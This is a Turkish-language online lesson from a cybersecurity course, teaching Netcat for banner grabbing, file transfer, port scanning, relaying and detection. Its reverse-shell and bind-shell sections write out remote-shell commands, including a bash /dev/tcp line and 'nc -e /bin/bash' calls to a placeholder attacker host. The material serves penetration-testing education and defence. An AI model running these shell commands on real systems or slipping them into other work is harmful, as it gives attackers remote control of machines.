Netcat: İsviçre Çakısı
Banner bilgileri, dosya aktarımı, bağlantı noktası yönlendirme ve basit ters kabuklar için nc kullanın.
Netcat: İsviçre Çakısı, CoddyKit'te ücretsiz bir Cyber Security Academy dersidir. Bu, 4 dersinin 3. dersidir. Aşağıdan dersin tamamını ücretsiz okuyabilir, sonra tarayıcıda yerleşik kod editörü ve 7/24 yapay zeka koçu ile uygulamalı olarak pratik yapabilirsin. Bu, Cyber Security Academy öğrenme yolunun bir parçasıdır ve ilerlemeniz web ve CoddyKit uygulaması arasında senkronize olur. Cyber Security Academy kursu toplamda 4 dersten oluşur.
Netcat Nedir
Netcat (nc), TCP veya UDP kullanarak ağ bağlantıları üzerinden veri okuyan ve yazan bir yardımcı programdır. Neredeyse tüm Unix sistemlerinde kurulu olarak bulunur; hata ayıklama, dosya aktarımı ve temel istismar için çok değerlidir.
Temel Bağlantı ve Servis Başlığı Bilgisi Edinme
Servis başlığını almak ve protokolle elle etkileşim kurmak için herhangi bir TCP bağlantı noktasına bağlanın. Bu, keşfin en basit biçimidir.
# Connect to port 80
nc 192.168.1.100 80
GET / HTTP/1.0
[Enter twice]
# Connect to SMTP
nc mail.example.com 25
# Returns: 220 mail.example.com ESMTPBir Bağlantı Noktasını Dinleme
Netcat, -l -p ile gelen bağlantıları dinleyebilir. Bu özellik bağlantıyı test etmek, ters kabukları yakalamak ve dosya almak için kullanışlıdır.
# Listen on port 4444
nc -lvnp 4444
# -l listen
# -v verbose
# -n no DNS resolution
# -p port numberNetcat ile Dosya Aktarımı
Netcat, dosyaları bir bağlantıya yönlendirerek gönderebilir. Alıcı dinler ve çıktıyı bir dosyaya yönlendirir. Şifreleme yoktur — yalnızca güvenilir ağlarda kullanın.
# Receiver (runs first):
nc -lvnp 4444 > received_file.txt
# Sender:
nc 192.168.1.10 4444 < file_to_send.txtNetcat ile Bağlantı Noktası Taraması
Netcat, -z (sıfır giriş/çıkış modu) ve -w (zaman aşımı) seçenekleriyle temel bağlantı noktası taraması yapabilir. Nmap'ten daha yavaştır; ancak Nmap kullanılamadığında işe yarar.
# Scan ports 20-80
nc -zv 192.168.1.100 20-80 2>&1 | grep succeeded
# With timeout:
nc -zvw2 192.168.1.100 22 80 443Basit Ters Kabuk
Ters kabuk, hedefin saldırgana geri bağlanmasını sağlar. Güvenlik duvarı kurallarının hedefe gelen bağlantıları engellediği sızma testlerinde kullanışlıdır.
# Attacker listens:
nc -lvnp 4444
# Target executes (bash):
bash -i >& /dev/tcp/attacker_ip/4444 0>&1
# Or via nc:
nc attacker_ip 4444 -e /bin/bashBağlama Kabuğu
Bağlama kabuğu hedef makinede dinleme yapar. Saldırgan buna bağlanır. Güvenlik duvarları genellikle gelen bağlantıları engellediği için modern sızma testlerinde daha az kullanılır.
# On target: listen and serve a shell
nc -lvnp 5555 -e /bin/bash
# On attacker: connect
nc target_ip 5555UDP Modu
UDP bağlantıları için -u kullanın. DNS (53 numaralı bağlantı noktası) ve SNMP (161 numaralı bağlantı noktası) gibi UDP hizmetlerini test etmek için kullanışlıdır.
# Test DNS over UDP
nc -u 8.8.8.8 53
# Test SNMP
nc -u 192.168.1.1 161Netcat ile Vekil Oluşturma
Netcat, ağlar arasında geçiş yapmak için bağlantıları zincirleyebilir. Adlandırılmış kanallarla (mkfifo) birlikte kullanıldığında, ek araçlar olmadan basit çift yönlü tüneller oluşturur.
mkfifo /tmp/pipe
nc -lvnp 4445 < /tmp/pipe | nc internal_host 80 > /tmp/pipeNcat: Modern Alternatif
Ncat (Nmap'in parçasıdır), Netcat'i SSL desteği (--ssl), erişim denetimi ve aracı moduyla genişletir. Şifrelenmiş kanallar için Ncat'i tercih edin.
# SSL listener
ncat --ssl -lvnp 4444
# SSL connect
ncat --ssl target_ip 4444Savunmacılar: Netcat'i Tespit Etme
Netcat bağlantıları normal TCP bağlantıları gibi görünür. Savunmacılar bunu işlem adı izleme (HIDS), olağandışı dışa giden bağlantı noktaları ve beklenmeyen üst işlemlerden başlatılan kabuklar aracılığıyla tespit eder.
Kısa Test
Hangi Netcat seçeneği dinleme modunu etkinleştirir?
Özet: Netcat
Netcat temel bir araçtır: servis başlığı bilgisi edinmek, dosya aktarmak, bağlantıyı test etmek ve ters/bağlama kabuğu mekaniklerini anlamak için kullanın. Yetkili sızma testlerinde güvenlik duvarı kurallarını doğrular ve saldırganın ağ içinde sıçramasını simüle eder. Hem kullanmak hem de tespit etmek için onu iyi tanıyın.
Sıkça Sorulan Sorular
“Netcat: İsviçre Çakısı” dersi ücretsiz mi?
Evet — “Netcat: İsviçre Çakısı” dersin tüm metni burada web'de ücretsiz olarak okunabilir. Etkileşimli olarak pratik yapmak (yerleşik kod editörü ve 7/24 yapay zeka koçu) ve Cyber Security Academy kursunun geri kalanını açmak için CoddyKit PRO'ya yükselt. Cyber Security Academy kursu toplamda 4 dersten oluşur.
“Netcat: İsviçre Çakısı” dersinde ne öğreneceğim?
Banner bilgileri, dosya aktarımı, bağlantı noktası yönlendirme ve basit ters kabuklar için nc kullanın. Cyber Security Academy ile uygulamalı kodu tarayıcıda doğrudan çalıştırarak pratik yaparsın ve 7/24 yapay zeka koçu dersi çalışırken sorularını yanıtlar.
Cyber Security Academy öğrenmeye başlamak için deneyim gerekli mi?
Önceden deneyim gerekmez. CoddyKit'te Cyber Security Academy, başlangıçtan ileri seviyeye kadar yapılandırıldığı için buradan başlayabilir veya başından başlayıp kendi hızında ilerleme yapabilirsin. Bu, 4 dersinin 3. dersidir.
“Netcat: İsviçre Çakısı” dersi ne kadar sürer?
Çoğu CoddyKit dersi yaklaşık 5–10 dakika sürer. Her biri kısa ve etkileşimli olduğu için sabit ilerleme yaparsın ve web ile uygulama arasında tam olarak bıraktığın yerden devam edebilirsin.
Bu Cyber Security Academy dersinde kod yazıp çalıştırabilir miyim?
Evet. Her Cyber Security Academy dersi yerleşik bir kod editörü içerir, bu sayede tarayıcıda gerçek kod yazıp çalıştırabilir ve anlık yapay zeka geri bildirimi alırsın — yerel kurulum gerekli değildir.
Bu kursun tüm dersleri
- Nmap Bağlantı Noktası Tarama Teknikleri
- Hizmet ve OS Parmak İzi Belirleme
- Netcat: İsviçre Çakısı
- Ağ Numaralandırma Betikleri